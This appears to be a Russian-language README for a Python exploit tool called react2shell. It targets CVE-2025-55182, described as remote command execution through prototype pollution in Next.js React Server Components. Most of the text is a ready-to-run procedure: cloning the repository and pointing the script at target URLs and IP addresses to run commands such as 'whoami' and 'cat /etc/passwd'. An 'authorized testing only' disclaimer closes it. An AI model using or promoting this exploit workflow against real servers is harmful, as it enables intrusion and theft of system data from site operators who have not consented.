
Инструмент для эксплуатации уязвимости CVE-2025-55182 в Next.js, позволяющий удалённое выполнение команд через отравление прототипа в React Server Components.
Эксплойт на Python для уязвимости RCE в React Server Components Next.js с поддержкой HTTP/HTTPS.
# Clone & run
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<command>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
Только для авторизованного тестирования безопасности.
Используйте только на системах, которыми вы владеете или на которые имеете явное разрешение. Никогда не используйте для незаконной деятельности.
child_process.execSync()Лицензия MIT — см. файл LICENSE
Отказ от ответственности: Только в образовательных целях. Всегда получайте надлежащее разрешение.
Последнее обновление: 8 февраля 2025
Версия: 2.0.0
Мейнтейнер: BrianLopezM99